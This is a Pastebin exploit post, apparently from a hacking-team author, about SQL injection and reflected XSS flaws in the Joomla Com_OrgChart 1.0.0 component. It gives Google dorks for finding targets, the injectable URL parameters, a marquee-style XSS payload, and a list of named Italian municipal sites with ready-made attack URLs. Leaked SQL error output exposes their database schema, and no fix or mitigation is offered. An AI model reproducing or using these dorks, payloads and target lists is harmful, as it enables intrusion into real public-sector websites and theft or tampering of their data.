Advertisement
KingSkrupellos

Joomla 1.5.26 Com_OrgChart Components 1.0.0 XSS SQL Inj

Aug 23rd, 2019
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.83 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Joomla 1.5.26 Com_OrgChart Components 1.0.0 XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 24/08/2019
  7. # Vendor Homepage : ibrini.com - cmspal.it - altropiano.com -
  8. # Software Download Link : extensions.joomla.org/extension/org-chart-iib/
  9. # Software Information Link : ibrini.com/en/boutique/information/2
  10. # Software Affected Version : Com_OrgChart - 1.0.0 - 1.x
  11. # Joomla Affected Version : 1.x to 1.5.26
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : intext:Realizzato con CMS-PAL 1.0 - Altropiano.com inurl:/index.php?option=com_orgchart
  16. intext:Realizzato con CMS-PAL 1.0 - Altropiano.com site:it
  17. inurl:/index.php?option=com_orgchart site:it
  18. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  19. Special Elements used in an SQL Command ('SQL Injection') ]
  20. CWE-79 [ Improper Neutralization of Input During
  21. Web Page Generation ('Cross-site Scripting') ]
  22. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  23. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  24. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  25.  
  26. ###################################################################
  27.  
  28. # Description About Software :
  29. *****************************
  30. Org Chart Tool is organizational chart with many options to display
  31. hierarchical charts, organizational structures and sets of nested elements.
  32.  
  33. ###################################################################
  34.  
  35. # Impact :
  36. ***********
  37. Joomla 1.5.26 Com_OrgChart Components 1.0.0 is prone to an SQL-injection vulnerability
  38. because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  39. Exploiting this issue could allow an attacker to compromise the application, access or
  40. modify data, or exploit latent vulnerabilities in the underlying database.
  41. A remote attacker can send a specially crafted request to the vulnerable application and
  42. execute arbitrary SQL commands in application`s database. Further exploitation of this
  43. vulnerability may result in unauthorized data manipulation.
  44. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  45.  
  46. Reflected XSS (or Non-Persistent) :
  47. ***************************************
  48. The server reads data directly from the HTTP
  49. request and reflects it back in the HTTP response. Reflected XSS exploits occur when an
  50. attacker causes a victim to supply dangerous content to a vulnerable web application,
  51. which is then reflected back to the victim and executed by the web browser. The most common
  52. mechanism for delivering malicious content is to include it as a parameter in a URL that is
  53. posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute
  54. the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
  55. that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
  56. the content is executed by the victim's browser.
  57.  
  58. ###################################################################
  59.  
  60. Admin Panel Login Path :
  61. ***********************
  62. /administrator/
  63.  
  64. # SQL Injection Exploit :
  65. **********************
  66. /index.php?option=com_orgchart&task=img&cat=[SQL Injection]
  67.  
  68. /index.php?option=com_orgchart&task=img&cat=[ID-NUMBER]&set=[ID-NUMBER]&c=[SQL Injection]
  69.  
  70. /index.php?option=com_orgchart&task=img&cat=[ID-NUMBER]&set=[ID-NUMBER]&c=[SQL Injection]&lang=it
  71.  
  72. # Cross Site Scripting XSS Exploit :
  73. ********************************
  74. /index.php?option=com_orgchart&task=img&cat=1%27<marquee>
  75. <font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee>
  76.  
  77. ###################################################################
  78.  
  79. # Example Vulnerable Sites :
  80. *************************
  81. [+] www.comune.portoazzurro.li.it/index.php?option=com_orgchart&task=img&cat=1%27
  82.  
  83. [+] www.comune.portoazzurro.li.it/index.php?option=com_orgchart&task=img&cat=1%27<marquee>
  84. <font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee>
  85.  
  86. [+] www.comune.marcianamarina.li.it/index.php?option=com_orgchart&task=img&cat=1%27
  87.  
  88. [+] www.comunevillabasilica.it/index.php?option=com_orgchart&task=img&cat=1%27
  89.  
  90. [+] www.comune.villabasilica.lu.gov.it/index.php?option=com_orgchart&task=img&cat=1%27
  91.  
  92. [+] www.comune.camponellelba.li.it/index.php?option=com_orgchart&task=img&cat=1%27
  93.  
  94. [+] latiano.info/index.php?option=com_orgchart&task=img&cat=1%27
  95.  
  96. [+] www.comune.rionellelba.li.it/index.php?option=com_orgchart&task=img&cat=1%27
  97.  
  98. ###################################################################
  99.  
  100. # Example SQL Database Error :
  101. ****************************
  102. You have an error in your SQL syntax; check the manual that corresponds to your MySQL
  103. server version for the right syntax to use near 'AND c.cat_resp = o.id' at line 2 SQL=SELECT *
  104. FROM cmspal_users AS o, cmspal_cat_orgchart AS c WHERE c.cat_id = AND c.cat_resp = o.id
  105. DB function failed with error number 1064
  106. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for
  107. the right syntax to use near '' ORDER BY m.added desc' at line 5 SQL=SELECT m.uff_name as uname,
  108. m.uff_desc as descrip, m.uff_id as id, m.added as added, m.uff_resp as resp, m.uff_addr as addr,
  109. m.uff_time as time, u.name as rname, u.*, m.cat_id as cid, m.doc_cat_id as did, c.* FROM cmspal_
  110. uff_orgchart AS m LEFT JOIN cmspal_cat_orgchart AS c ON ( m.cat_id = c.cat_id ) LEFT JOIN
  111. cmspal_users AS u ON ( m.uff_resp = u.id ) WHERE m.uff_id=1' ORDER BY m.added desc
  112.  
  113. ###################################################################
  114.  
  115. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  116.  
  117. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement